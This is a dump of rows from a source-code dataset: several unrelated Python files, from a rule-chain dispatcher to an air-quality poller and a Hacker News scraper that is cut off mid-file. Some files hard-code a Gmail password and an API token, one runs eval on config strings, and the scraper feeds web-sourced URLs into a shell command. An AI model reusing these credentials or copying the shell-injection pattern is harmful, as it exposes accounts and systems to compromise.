blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2 values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107 values | src_encoding stringclasses 20 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.02M | extension stringclasses 78 values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
cec549844f429ed57e856702a1979e9d7ed82176 | 4574f5c8e491993dbb89b8a0abc63ede4b9adfc0 | /src/rule_chains/dispatch.py | dd4fe6c45e938b70d29325a739976965815a027b | [
"Apache-2.0"
] | permissive | deeso/rule-chains | 93f472e79b2e2eb9a17618a11940b7fe9afb00bb | 499e42626a4c1911be7916aabfcb76a7172a55cd | refs/heads/master | 2021-01-21T08:11:53.675403 | 2018-03-13T05:37:23 | 2018-03-13T05:37:23 | 101,954,836 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,097 | py | class ChainDispatchResult(object):
def __init__(self, table_name, chain_name=None, success=False,
chain_result=None,
block_results=None, chain_results=None, rvalue=None,
extraction_rule_results=None, outcome=False,
extraction_value=None, block_name=None):
self.table_name = table_name
self.extraction_rule_results = extraction_rule_results
self.extraction_value = extraction_value
self.chain_name = chain_name
self.chain_outcome = outcome
self.chain_rvalue = rvalue
self.block_name = block_name
self.block_results = block_results
self.chain_result = chain_result
self.outcome = outcome
    def get_chain_results(self):
        # Accessor for the wrapped chain result object (may be None).
        return self.chain_result
def get_rule_results(self):
if self.chain_result is not None:
return self.chain_result.get_rule_results()
return None
def get_rule_name(self):
if self.chain_result is not None:
return self.chain_result.get_rule_name()
return None
def update_from_chain_result(self, chain_result):
self.chain_name = chain_result.chain_name
self.chain_result = chain_result
self.chain_outcome = chain_result.outcome
self.block_name = chain_result.block_name
self.block_results = chain_result.block_results
self.chain_rvalue = chain_result.rvalue
self.outcome = chain_result.outcome
class ChainDispatch(object):
    """Dispatches a string to one of several rule chains.

    A value is extracted from the input (via an extraction rule plus a
    user-supplied lambda/function source string) and used as a key into
    ``dispatch_table`` to select the chain that gets executed.
    """

    def __init__(self, name, extract_rule, extract_type, extract_value,
                 all_blocks=None, any_blocks=None, none_blocks=None,
                 blocks=None, dispatch_table=None, perform_blocks=None):
        # Bugfix: the previous mutable defaults ([] / {}) were shared across
        # every instance; normalize None to fresh containers instead.
        self.name = name
        self.extract_rule = extract_rule
        self.dispatch_table = {} if dispatch_table is None else dispatch_table
        self.raw_value = extract_value
        self.perform_blocks = perform_blocks
        self.blocks = [] if blocks is None else blocks
        self.all_blocks = [] if all_blocks is None else all_blocks
        self.any_blocks = [] if any_blocks is None else any_blocks
        self.none_blocks = [] if none_blocks is None else none_blocks
        # Compiled callable: (state, rule_results) -> extracted dispatch key.
        self.extract_value = self.code_factory(extract_type, extract_value)

    @classmethod
    def code_factory(cls, ctype, cvalue):
        """Build the extraction callable from its source string.

        SECURITY: ``eval`` executes arbitrary code -- only load chain
        definitions from trusted configuration files.
        """
        if ctype in ('lambda', 'function'):
            return eval(cvalue)
        # Unknown type: fall back to a no-op extractor.
        return lambda state, res: None

    @classmethod
    def from_json(cls, json_data, block_objs=None, chains=None, chains_def=None):
        """Create a ChainDispatch from a parsed JSON definition.

        Raises:
            Exception: if name/extract_rule/extract_type/extract_value is
                missing from *json_data*.
        """
        block_objs = {} if block_objs is None else block_objs
        chains = {} if chains is None else chains
        name = json_data.get('name', None)
        extract_rule = json_data.get('extract_rule', None)
        etype = json_data.get('extract_type', None)
        evalue = json_data.get('extract_value', None)
        any_blocks = json_data.get('any', [])
        all_blocks = json_data.get('all', [])
        none_blocks = json_data.get('none', [])
        _blocks = any_blocks + all_blocks + none_blocks
        # Resolve referenced block names to their objects (unknown names skipped).
        blocks = dict((c, block_objs.get(c)) for c in _blocks
                      if c in block_objs)
        perform_blocks = json_data.get('perform_blocks', [])
        if name is None or \
                extract_rule is None or \
                etype is None or \
                evalue is None:
            raise Exception("Missing required Block parameters")
        dispatch_table = {}
        # Bugfix: JSON yields a mapping here, and iterating a dict directly
        # produces keys, so ``for k, v in ...`` raised.  Accept either a
        # mapping or an iterable of (key, chain_name) pairs.
        table_def = json_data.get('dispatch_table', {})
        items = table_def.items() if isinstance(table_def, dict) else table_def
        for k, v in items:
            dispatch_table[k] = chains.get(v, None)
        return ChainDispatch(name, extract_rule, etype, evalue,
                             all_blocks=all_blocks, any_blocks=any_blocks,
                             none_blocks=none_blocks, blocks=blocks,
                             dispatch_table=dispatch_table,
                             perform_blocks=perform_blocks)

    def execute_value_extraction(self, string, frontend=None, state=None):
        """Match the extraction rule against *string* and derive the key."""
        state = {} if state is None else state
        # Bugfix: use getattr so a missing self.frontend does not raise an
        # opaque AttributeError before the explicit checks/calls below.
        frontend = frontend if frontend is not None else getattr(self, 'frontend', None)
        results = frontend.match_pattern(self.extract_rule, string)
        value = self.extract_value(state, results.get('rule_results', {}))
        return value, results

    def execute_dispatch(self, string, frontend=None, state=None):
        """Extract the dispatch key from *string* and run the mapped chain.

        Returns a ChainDispatchResult; if no chain is mapped to the key the
        result only carries the extraction value/rule results.
        """
        state = {} if state is None else state
        cdr = ChainDispatchResult(self.name)
        frontend = frontend if frontend is not None else getattr(self, 'frontend', None)
        if frontend is None:
            raise Exception("Missing frontend reference")
        # TODO run a pre-check set of blocks or chains
        # before executing the value extraction
        value, rule_results = self.execute_value_extraction(string,
                                                            frontend, state)
        cdr.extraction_value = value
        cdr.extraction_rule_results = rule_results
        chains = self.dispatch_table.get(value, None)
        if chains is not None:
            chain_result = chains.execute_chains(string)
            cdr.update_from_chain_result(chain_result)
        return cdr

    def update_frontend(self, frontend):
        """Attach the rule-matching frontend used when none is passed in."""
        self.frontend = frontend
| [
"adam.pridgen@thecoverofnight.com"
] | adam.pridgen@thecoverofnight.com |
57a6ff8fd720a80cb15839c2e0932f27d9b3a853 | 676b5bf3737477597b97b1efdf955bdf38e9e7c6 | /production.py | 6e22ff73bb07ba4b791e2ccba6883dc51933f918 | [] | no_license | blandry/ike | fbf31aaf58604353a8804df920eb4bf616e40185 | e4f7954d35b6f325b5a8056e875d01428924b08e | refs/heads/master | 2016-09-06T07:24:46.296660 | 2013-02-04T20:14:35 | 2013-02-04T20:14:35 | 8,014,505 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 251 | py | # SERVER
# Deployment settings for the production server (values filled in at deploy time).
DEBUG = False
# Secret key used for session signing -- must be set before deploying.
SECRET_KEY = ""
HOST_ADDRESS = ""
DATABASE = ""
# Outgoing mail: SMTP over SSL (port 465) configuration.
SMTP_SETTINGS = {
    "MAIL_SERVER": "",
    "MAIL_PORT": 465,
    "MAIL_USE_SSL": True,
    "MAIL_USERNAME": "",
    "MAIL_PASSWORD": "",
    "DEFAULT_MAIL_SENDER": ("Ike", "")
}
| [
"landry@mit.edu"
] | landry@mit.edu |
2d24bf026f2a9076fab6ab81a9eb523d592a70ac | 6d3b954188c670864d302bf5846ab71225bfd24b | /Lab 2.py | ebe1ad14b3bf42a7a849f4529e1fb01279106fdf | [] | no_license | johnperd/Coding-Projects | 8d18c16bca928b0fcca3da3760084342d98da32d | 6458fd09a6bec82e7b0735f0e6c214a4ed6b7dd7 | refs/heads/master | 2022-10-31T06:24:25.059420 | 2020-06-15T15:48:29 | 2020-06-15T15:48:29 | 272,480,197 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,016 | py | #!/usr/bin/env python
# coding: utf-8
# Type Markdown and LaTex: $a^2$
# In[1]:
from resources306 import*
# In[2]:
def euler_path(rhs, x, y, x_end, steps):
    """Forward-Euler integration of y' = rhs(x, y); returns (xs, ys) samples."""
    h = (x_end - x) / steps
    xs, ys = [x], [y]
    for _ in range(steps):
        y = y + h * rhs(x, y)
        x = x + h
        xs.append(x)
        ys.append(y)
    return xs, ys


# In[2]: y' = x^2 - x^2*y with y(0) = 3, integrated over [0, 5] in 20 steps.
def f(x, y):
    return x**2 - x**2 * y


xlist, ylist = euler_path(f, 0, 3, 5, 20)

# In[3]: overlay the Euler approximation on the slope field.
plt.figure(figsize=(8, 8))
slopefieldplot(f, 0, 4, 0, 4, .1, lw=2)
plt.plot(xlist, ylist, 'mo-', lw=3, alpha=.6, label='Euler Approximation')
plt.xlabel('x')
plt.ylabel('y')
plt.legend(loc='center')

# In[4]: y' = x - y + 2 with y(0) = 5, integrated over [0, 8] in 16 steps.
def f(x, y):
    return x - y + 2


xlist, ylist = euler_path(f, 0, 5, 8, 16)

# In[5]:
plt.figure(figsize=(8, 8))
slopefieldplot(f, 0, 4, 2, 7, .1, lw=2)
plt.plot(xlist, ylist, 'mo-', lw=3, alpha=.6, label='Euler Approximation')
plt.xlabel('x')
plt.ylabel('y')
plt.legend(loc='center')
# In[ ]:
| [
"noreply@github.com"
] | noreply@github.com |
f582bd1fe8a38bfb9010d139d33a72d4f79d7469 | 401aae63dde689f298c196b9063b6dca3ecf529b | /utils.py | 4f3987e6e9f34679e576b4a3765a5a7ebe79e7e9 | [] | no_license | dunovank/Hierarchical-Attention-Network-1 | 1791c4afddaf786abd60e05bf3eb4b542c9a1306 | 558660c7030e41698b62702c88741f0a893c8509 | refs/heads/master | 2021-10-25T09:17:28.882012 | 2019-04-03T11:50:51 | 2019-04-03T11:50:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,591 | py | import matplotlib.pyplot as plt
import numpy as np
from matplotlib.lines import Line2D
def plot_grad_flow(named_parameters):
    '''Plots the gradients flowing through different layers in the net during training.
    Can be used for checking for possible gradient vanishing / exploding problems.
    Usage: Plug this function in Trainer class after loss.backwards() as
    "plot_grad_flow(self.model.named_parameters())" to visualize the gradient flow'''
    ave_grads = []
    max_grads = []
    layers = []
    for n, p in named_parameters:
        if (p.requires_grad) and ("bias" not in n):
            try:
                # p.grad is None before the first backward(); .abs() then raises.
                avg_grad = p.grad.abs().mean()
                max_grad = p.grad.abs().max()
            except Exception as err:
                # Bugfix: the layer name used to be appended *before* this try
                # block, so a failing parameter desynchronized `layers` from the
                # gradient lists and mislabeled the x-axis ticks below.  Also
                # include the exception itself instead of swallowing it silently.
                print("Encountered Exception at {}: {}".format(n, err))
                continue
            layers.append(n)
            ave_grads.append(avg_grad)
            max_grads.append(max_grad)
    plt.bar(np.arange(len(max_grads)), max_grads, alpha=0.1, lw=1, color="c")
    plt.bar(np.arange(len(max_grads)), ave_grads, alpha=0.1, lw=1, color="b")
    plt.hlines(0, 0, len(ave_grads) + 1, lw=2, color="k")
    plt.xticks(range(0, len(ave_grads), 1), layers, rotation="vertical")
    plt.xlim(left=0, right=len(ave_grads))
    plt.ylim(bottom=-0.001, top=0.5)  # zoom in on the lower gradient regions
    plt.xlabel("Layers")
    plt.ylabel("average gradient")
    plt.title("Gradient flow")
    plt.grid(True)
    plt.legend([Line2D([0], [0], color="c", lw=4),
                Line2D([0], [0], color="b", lw=4),
                Line2D([0], [0], color="k", lw=4)], ['max-gradient', 'mean-gradient', 'zero-gradient'])
    plt.show()
"shikhar.chauhan@live.com"
] | shikhar.chauhan@live.com |
5d2082d3e3def9f57df6a426a6737196aaf6343c | 52f29bc09f0a18e875f05281d72f1ca1384f2ff1 | /src/main.py | 2a63e2e1710f08c18051b0deabdcee66169707f2 | [] | no_license | S-Tabayashi/predict-_stock_prices | c1dca789bd4a5e9ee7a0ec0b19406e891f1ccdc6 | b62ab1fd73158044ea36d6db2fcc70e88877c335 | refs/heads/master | 2023-03-28T18:02:51.680427 | 2021-03-24T00:25:59 | 2021-03-24T00:25:59 | 350,893,237 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 381 | py | from predictor import ScoringService as cls
# Define where the downloaded and extracted dataset files are placed.
# Data storage directory.
DATASET_DIR= "../../data_dir"
# Define the input files to load.
inputs = cls.get_inputs(DATASET_DIR)
print(inputs)
# Train the model on the loaded inputs and save it under "model".
cls.train_and_save_model(inputs, model_path="model")
"stmode2003@gmail.com"
] | stmode2003@gmail.com |
bd917135a719065989f4c65a11886c065ce87756 | 41bf060da18b573e3b9184ce6e263266618864f3 | /app/blueprints/search/__init__.py | 3c3ea08250d01ebba123dc4627fbcd3c15969e75 | [] | no_license | vioan/pinboard-archiver | ebf4710c8f630dc8aa97ac58d37ea1d780c7e83d | 99d0d38bc9710443c226fe3c7c2aed0c88cf97c0 | refs/heads/master | 2020-05-26T07:11:42.917259 | 2012-11-28T08:20:52 | 2012-11-28T08:20:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 100 | py | from flask import Blueprint
# Flask blueprint for the search feature; its templates live in ./templates.
blueprint = Blueprint('search', __name__, template_folder='templates')
| [
"edward.stone@tobias.tv"
] | edward.stone@tobias.tv |
879c72a749aa447e3cf0d98e4a0ad65d7b96ec4b | 97ad602612adf894bdfab85c4867cac69b2d7c99 | /learnpythonthehardway/erect-fence.py | c6590a9ee3c6e8e39d645b035aeca2371444cfce | [] | no_license | cotncndy/leetcode-python | bebd15f3dd44e8ed1c5f33f29314977de4fcc141 | 591067d87209702c4d41e1a9fce88f9dd1815fed | refs/heads/master | 2020-03-17T03:05:07.182353 | 2018-05-10T16:37:57 | 2018-05-10T16:37:57 | 133,219,257 | 0 | 3 | null | 2018-05-13T08:34:43 | 2018-05-13T08:34:43 | null | UTF-8 | Python | false | false | 2,630 | py | # There are some trees, where each tree is represented by (x,y) coordinate in a two-dimensional garden. Your job is
# to fence the entire garden using the minimum length of rope as it is expensive. The garden is well fenced only if
# all the trees are enclosed. Your task is to help find the coordinates of trees which are exactly located on the
# fence perimeter.
#
# Example 1:
# Input: [[1,1],[2,2],[2,0],[2,4],[3,3],[4,2]]
# Output: [[1,1],[2,0],[4,2],[3,3],[2,4]]
# Explanation:
#
# Example 2:
# Input: [[1,2],[2,2],[4,2]]
# Output: [[1,2],[2,2],[4,2]]
# Explanation:
#
# Even you only have trees in a line, you need to use rope to enclose them.
# Note:
#
# All trees should be enclosed together. You cannot cut the rope to enclose trees that will separate them in more
# than one group.
# All input integers will range from 0 to 100.
# The garden has at least one tree.
# All coordinates are distinct.
# Input points have NO order. No order required for output.
# Definition for a point.
class Point(object):
    """A 2-D point with x/y coordinates; defaults to the origin."""
    def __init__(self, a=0, b=0):
        self.x, self.y = a, b
class Solution(object):
    """Convex-hull ("fence") computation via gift wrapping (Jarvis march),
    keeping collinear boundary points as the problem requires."""

    def outerTrees(self, points):
        """
        :type points: List[Point]
        :rtype: List[Point]

        Returns all points lying on the fence perimeter (no order guaranteed).
        """
        # res: hull points found so far; collinear: points on the current
        # hull edge; start: left-most point, which is guaranteed on the hull.
        res, collinear, start = set(), set(), points[0]
        for p in points:  # find the left most point
            if p.x < start.x:
                start = p
        res.add(start)
        cur = start
        while True:
            next = points[0]
            for p in points:
                if p == cur:
                    continue
                cross = self.dotProduct(cur, next, p)
                if cross > 0:
                    # p is a strictly better wrapping candidate than `next`;
                    # the collected collinear set no longer applies.
                    next, collinear = p, set()
                elif cross == 0:
                    # p lies on the cur->next line: keep the farthest point
                    # as the candidate and remember the nearer ones so they
                    # are still reported as fence points.
                    if self.dist(cur, next) < self.dist(cur, p):
                        collinear.add(next)
                        next = p
                    else:
                        collinear.add(p)  # bugfixed
            for p in collinear:
                res.add(p)
            if next == start:
                # Wrapped all the way around the hull.
                break
            res.add(next)
            cur = next
        return list(res)

    def dotProduct(self, a, b, c):
        # NOTE(review): despite the name, this is the 2-D cross product of
        # the vectors b->a and b->c, used purely as an orientation test.
        baX, baY = a.x - b.x, a.y - b.y
        bcX, bcY = c.x - b.x, c.y - b.y
        return baX * bcY - baY * bcX

    def dist(self, a, b):
        # Squared Euclidean distance (used for ordering only, so no sqrt).
        return (a.x - b.x) ** 2 + (a.y - b.y) ** 2

    def wrapper(self, a):
        """Convert [[x, y], ...] input lists to Point objects and run outerTrees."""
        li = []
        for p in a:
            li.append(Point(p[0], p[1]))
        return self.outerTrees(li)
if __name__ == '__main__':
    # Smoke test with the sample input from the problem statement.
    s = Solution().wrapper([[1, 1], [2, 2], [2, 0], [2, 4], [3, 3], [4, 2]])
| [
"xin_wei@intuit.com"
] | xin_wei@intuit.com |
1ee20e93ca836125eae3cb9415d3f3ac36ae0383 | 2f08b7b60fa308488897fcc2d324f92e0ef4cbda | /wiseassenterprises.com/html/weather/we3.py | 2bd17b5eb895d1f034a1f24e766c0cc36d910b43 | [] | no_license | ravirajpophale/www | 1f5db1bab7282217850130c0f5c4260f09c1cbec | bb777a20abf22b1613b77995b6e3f09da61a59b1 | refs/heads/master | 2023-06-12T00:46:34.271860 | 2021-07-05T15:52:39 | 2021-07-05T15:52:39 | 383,192,311 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,418 | py | import urllib, json
import os
import time, datetime
__author__ = 'Mayur Kulkarni <mayurkulkarni012@gmail.com>'
def get_json(loc):
    """Fetch the current AQI reading for a station from the WAQI geo feed.

    loc: dict with "lat"/"lon" keys (see station_info below).
    Returns the parsed JSON response as a dict.

    SECURITY: the API token is hard-coded into the URL; move it to
    configuration before sharing this script.
    """
    #url = 'http://api.waqi.info/feed/geo:18.536428;73.805453/?token=9d43420bc698329eedd8eb12f0bf98e66426ca98'#pashan
    url = "http://api.waqi.info/feed/geo:" + str(loc["lat"]) + ";" + str(loc["lon"]) + "/?token=9d43420bc698329eedd8eb12f0bf98e66426ca98"
    response = urllib.urlopen(url)
    data = json.loads(response.read())
    return data
def append_headers(file_handle):
    """Write the CSV column-header line to *file_handle*."""
    header = 'timestamp, aqi, co, h, no2, o3, pm10, pm25, t'
    file_handle.write(header + '\n')
def current_timestamp():
    """Local time formatted as 'YYYY-MM-DD HH:MM:SS'."""
    return datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
# Monitoring stations (in and around Pune), keyed by name.  Each entry holds
# the WGS84 coordinates used to query the WAQI geo feed in get_json().
station_info = {
    "bhosari": {
        "lat": 18.642103,
        "lon": 73.849083,
    },
    "shivajinagar": {
        "lat": 18.529603,
        "lon": 73.849586,
    },
    "hadapsar": {
        "lat": 18.502167,
        "lon": 73.927456,
    },
    "katraj": {
        "lat": 18.459869,
        "lon": 73.852306,
    },
    "manjri": {
        "lat": 18.526778,
        "lon": 73.975028,
    },
    "pashan": {
        "lat": 18.536428,
        "lon": 73.805453,
    },
    "nigdi": {
        "lat": 18.6571,
        "lon": 73.7659,
    },
    "bhumkar-chowk": {
        "lat": 18.606219,
        "lon": 73.750022,
    },
    "Alandi": {
        "lat": 18.673708,
        "lon": 73.891506,
    },
}
def write_data():
file_name = 'weather_data_'
for station in station_info:
f = None
if os.path.exists(os.getcwd() + '\\' + file_name + station + '.csv'):
# don't append headers
print 'file ' + file_name + station + '.csv' + ' already present, resuming writing'
f = open(file_name + station + '.csv', 'a+')
else:
# append headers
print 'file not present, creating file: ' + file_name + station + '.csv'
f = open(file_name + station + '.csv', 'a+')
append_headers(f)
json_response = get_json(station_info[station])
if json_response['status'] == 'ok':
print 'HTTP response OK. Collecting data for ' + station + ' at time ' + current_timestamp()
row_string = '{0}, {1}, {2}, {3}, {4}, {5}, {6}, {7}, {8}\n'.format(current_timestamp(), json_response['data']['aqi'],
json_response['data']['iaqi']['co']['v'] if 'co' in json_response['data']['iaqi'] else 'NA',
json_response['data']['iaqi']['h']['v'] if 'h' in json_response['data']['iaqi'] else 'NA',
json_response['data']['iaqi']['no2']['v'] if 'no2' in json_response['data']['iaqi'] else 'NA',
json_response['data']['iaqi']['o3']['v'] if 'o3' in json_response['data']['iaqi'] else 'NA',
json_response['data']['iaqi']['pm10']['v'] if 'pm10' in json_response['data']['iaqi'] else 'NA',
json_response['data']['iaqi']['pm25']['v'] if 'pm25' in json_response['data']['iaqi'] else 'NA',
json_response['data']['iaqi']['t']['v']) if 't' in json_response['data']['iaqi'] else 'NA'
f.write(row_string)
else:
with open('weather_data_log.txt', 'a+') as error:
error.write(json_response)
error.close()
f.close()
def nl():
    """Print a 75-character separator line."""
    print('*' * 75)
if __name__ == '__main__':
    nl()
    print 'Running script to collect data from: http://api.waqi.info/feed/geo:18.526778;73.975028'
    nl()
    time.sleep(3)
    # Poll every configured station once an hour, forever (Ctrl-C to stop).
    while (True):
        write_data()
        nl()
        print 'Iteration completed, sleeping for 1 hour'
        nl()
        time.sleep(3600)
| [
"raviraj.pophale@gmail.com"
] | raviraj.pophale@gmail.com |
b69b52e5f9ea49a0fb6647fb95417e9d880c1ac1 | 5acc77c4d594c1750a9b7477499ee25b4c307bca | /ehpi_action_recognition/networks/action_recognition_nets/action_rec_net_ehpi.py | b0f025abbc592698624fe9a900a4b478838ee111 | [
"MIT"
] | permissive | noboevbo/ehpi_action_recognition | bc15a3c260c79b85a82844a2779c9b1ec9cf42fd | 3b77eeb5103f0f11c8d4be993ec79dddad7e661c | refs/heads/master | 2021-12-29T05:24:31.891044 | 2021-12-19T16:23:36 | 2021-12-19T16:23:36 | 180,351,212 | 113 | 23 | null | 2019-04-23T11:24:27 | 2019-04-09T11:22:45 | Python | UTF-8 | Python | false | false | 3,202 | py | from typing import List, Dict
import cv2
import numpy as np
import torch
from nobos_commons.data_structures.dimension import ImageSize
from nobos_commons.data_structures.human import Human
from nobos_commons.data_structures.humans_metadata.algorithm_output_buffer import AlgorithmOutputBuffer
from nobos_commons.data_structures.humans_metadata.algorithm_output_buffer_entry import AlgorithmOutputBufferEntry
from nobos_commons.feature_preparations.feature_vec_producers.from_skeleton_joints.feature_vec_producer_ehpi import \
FeatureVecProducerEhpi
from nobos_torch_lib.datasets.action_recognition_datasets.ehpi_dataset import RemoveJointsOutsideImgEhpi, NormalizeEhpi
from torch.autograd import Variable
class ActionRecNetEhpi(object):
    """Runs EHPI-based action recognition over a 32-frame sliding window of
    per-human pose feature vectors."""

    def __init__(self, model, feature_vec_producer: FeatureVecProducerEhpi, image_size: ImageSize):
        # model: trained EHPI classifier; moved to the GPU and switched to
        # inference mode below (CUDA is required).
        self.model = model
        self.feature_vec_producer = feature_vec_producer
        # Ring buffer holding the last 32 frames of feature vectors per human.
        self.action_buffer: AlgorithmOutputBuffer = AlgorithmOutputBuffer(buffer_size=32)
        self.remove = RemoveJointsOutsideImgEhpi(image_size)
        self.normalize = NormalizeEhpi(image_size)
        model.cuda()
        model.eval()

    def get_actions(self, humans: List[Human], frame_nr: int) -> Dict[str, np.ndarray]:
        """Buffer this frame's features and classify humans with a full buffer.

        Returns a dict mapping human uid -> raw network scores for the
        32-frame window (only humans present in all buffered frames).
        NOTE(review): score shape depends on the model head -- confirm.
        """
        ehpi_vecs = []
        for human in humans:
            ehpi_vecs.append(
                AlgorithmOutputBufferEntry(human.uid, self.feature_vec_producer.get_feature_vec(human.skeleton)))
        self.action_buffer.add(ehpi_vecs, frame_nr)
        humans_for_action_rec = self.action_buffer.get_all(only_full_buffer=True)
        outputs: Dict[str, np.ndarray] = {}
        for human_id, action_vecs in humans_for_action_rec.items():
            # Stack the buffered vectors into a 32x15x3 EHPI image
            # (frames x features x channels -- 15 presumably the joint count,
            # TODO confirm against FeatureVecProducerEhpi).
            ehpi_img = np.zeros((32, 15, 3), dtype=np.float32)
            for frame_num, action_vec in enumerate(action_vecs):
                if action_vec is None:
                    continue
                ehpi_img[frame_num] = action_vec
            # Reorder to channels-first for the network.
            ehpi_img = np.transpose(ehpi_img, (2, 0, 1))
            # Set Blue Channel to zero
            ehpi_img[2, :, :] = 0
            # Normalize EHPI
            tmp_dict = {'x': ehpi_img}
            tmp_dict['x'] = self.remove(tmp_dict)['x']
            ehpi_img = self.normalize(tmp_dict)['x']
            # action_img = np.transpose(np.copy(ehpi_img), (2, 1, 0))
            # action_img *= 255
            # action_img = action_img.astype(np.uint8)
            # # action_img = cv2.resize(action_img, (action_img.shape[1] * 30, action_img.shape[0] * 30), cv2.INTER_NEAREST)
            # action_img = cv2.cvtColor(action_img, cv2.COLOR_BGR2RGB)
            # cv2.imshow("ehpi", action_img)
            # cv2.waitKey(1)
            # cv2.imwrite(os.path.join(get_create_path("/media/disks/beta/dump/itsc_2019_imgs/ehpi"),
            #                          "{}.png".format(str(frame_nr).zfill(5))), action_img)
            # Batch of one sample, channels-first.
            net_input = np.zeros((1, 3, 32, 15), dtype=np.float32)
            net_input[0] = ehpi_img
            input_seq = Variable(torch.tensor(net_input, dtype=torch.float)).cuda()
            tag_scores = self.model(input_seq).data.cpu().numpy()[0]
            outputs[human_id] = tag_scores
        return outputs
| [
"Dennis.Ludl@reutlingen-university.de"
] | Dennis.Ludl@reutlingen-university.de |
d9125665480f9fb273f6e7705380e50c2a1ebaca | 91f38b3f1d4509d55ad80e9ba9f56a2b78beeee4 | /get_data.py | a7d796b2eafbfd1c9f3ecbf255603732e46e8385 | [] | no_license | tyc/weekendprj | 3995e607c2269a9bb7481a5d0158032b7e344bd1 | 6d71c6fe2bbb020b6ca22bcf8df80fda27acd240 | refs/heads/master | 2016-09-10T19:51:08.938223 | 2012-07-09T21:02:24 | 2012-07-09T21:02:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,172 | py | #!/usr/bin/python
import urllib2
import simplejson as json
import smtplib
import datetime
from optparse import OptionParser
import subprocess
def test(abc):
    """Send *abc* (an HTML fragment) appended to a stub body via Gmail SMTP.

    SECURITY: the sender address and password are hard-coded below; move
    them to environment variables / config and rotate the exposed password.
    """
    SMTP_SERVER = 'smtp.gmail.com'
    SMTP_PORT = 587
    sender = 'tehn.yit.chin@gmail.com'
    recipient = 'tehn.yit.chin@gmail.com'
    subject = 'Gmail SMTP Test'
    body = 'blah blah blah'
    body = body + abc
    headers = "\r\n".join(["From: " + sender,
                           "Subject: " + subject,
                           "To: " + recipient,
                           "MIME-Version: 1.0",
                           "Content-Type: text/html"])
    session = smtplib.SMTP(SMTP_SERVER, SMTP_PORT)
    session.ehlo()
    session.starttls()
    # Bugfix: this was ``session.ehlo`` (attribute access, not a call), so
    # the required post-STARTTLS EHLO was never actually sent.
    session.ehlo()
    session.login(sender, 'chillout123')
    session.sendmail(sender, recipient, headers + "\r\n\r\n" + body)
    session.quit()
    return None
# --- Command line: -l/--limits caps how many articles to fetch (default 30).
parser = OptionParser()
parser.add_option("-l", "--limits", dest="limits", help="max number of queries to get")
(options, args)=parser.parse_args()
if options.limits != None:
    limit = int(options.limits)
else:
    limit = 30
print "Getting " + str(limit) + " number of articles"
# --- Build the HNSearch (thriftdb) query URL for recent "Show HN" items.
search_base_url = 'http://api.thriftdb.com/api.hnsearch.com/items/_search?limit='
start = 0
sort_by = 'create_ts+desc'
base_url_orig = "http://api.thriftdb.com/api.hnsearch.com/items/_search?limit=30&sortby=create_ts+desc&q=%22Show+HN%22&weights[title]=1.1&weights[text]=0.7&weights[domain]=2.0&weights[username]=0.1&weights[type]=0.0&boosts[fields][points]=0.15&boosts[fields][num_comments]=0.15&boosts[functions][pow(2,div(div(ms(create_ts,NOW),3600000),72))]=200.0&pretty_print=true"
prefix_url = "http://api.thriftdb.com/api.hnsearch.com/items/_search?limit="
post_url = "&sortby=create_ts+desc&q=%22Show+HN%22&weights[title]=1.1&weights[text]=0.7&weights[domain]=2.0&weights[username]=0.1&weights[type]=0.0&boosts[fields][points]=0.15&boosts[fields][num_comments]=0.15&boosts[functions][pow(2,div(div(ms(create_ts,NOW),3600000),72))]=200.0&pretty_print=true"
base_url = prefix_url + repr(limit)
base_url = base_url + "&start=" + repr(start) + post_url
# Fetch and parse the search results.
req = urllib2.Request(base_url)
opener = urllib2.build_opener()
f = opener.open(req)
json_obj = json.load(f)
# get the filename (dated CSV, e.g. 20130101_from_hnsearch.csv)
filename = datetime.datetime.now().strftime("%Y%m%d")
filename = str(filename) + "_from_hnsearch.csv"
output_file = open(filename, "w")
# print out each line that is not in the file
output_file.write("create_ts,title,url,id,hn_discussion\n")
for title in json_obj["results"]:
    # Build one CSV row: create_ts, title, url, id, HN discussion link.
    string = title["item"]["create_ts"]
    string = string + ","
    if title["item"]["title"] != "":
        string = string + "\""
        string += repr(title["item"]["title"] )
        string = string + "\""
    else:
        string += repr("")
    string = string + ","
    if title["item"]["url"] != "":
        string = string + "\""
        string += repr(title["item"]["url"] )
        url_string = str(title["item"]["url"])
        string = string + "\""
    else:
        string += repr("")
    string = string + ","
    string += repr(title["item"]["id"])
    string += ","
    string = string + "\""
    string += "http://news.ycombinator.com/item?id="
    string += repr(title["item"]["id"])
    string = string + "\""
    output_file.write(string+"\n")
    # NOTE(review): url_string is only assigned when the item has a url --
    # a first item without one raises NameError, and later items without
    # one reuse a stale url from a previous iteration; confirm and fix.
    if url_string != "":
        itemid_string=repr(title["item"]["id"])
        params = ["./get_shot.py", "--url="+url_string]
        # SECURITY: shell=True with an externally supplied URL permits shell
        # injection; prefer subprocess.call(params, shell=False).
        exitcode = subprocess.call("./get_shot.py --id="+itemid_string+" --url="+url_string, shell=True)
output_file.close()
#title_abc = "fatdog"
#url = "google.com"
#url_text = "google.com"
#id_abc=repr(123)
#html_message = "<p><font face='Arial, Helvetica, sans-serif'><b>Project :</b>" + title_abc + "</font></p>";
#html_message += "<p><font face='Arial, Helvetica, sans-serif'><b>Where:</b> </font>" ;
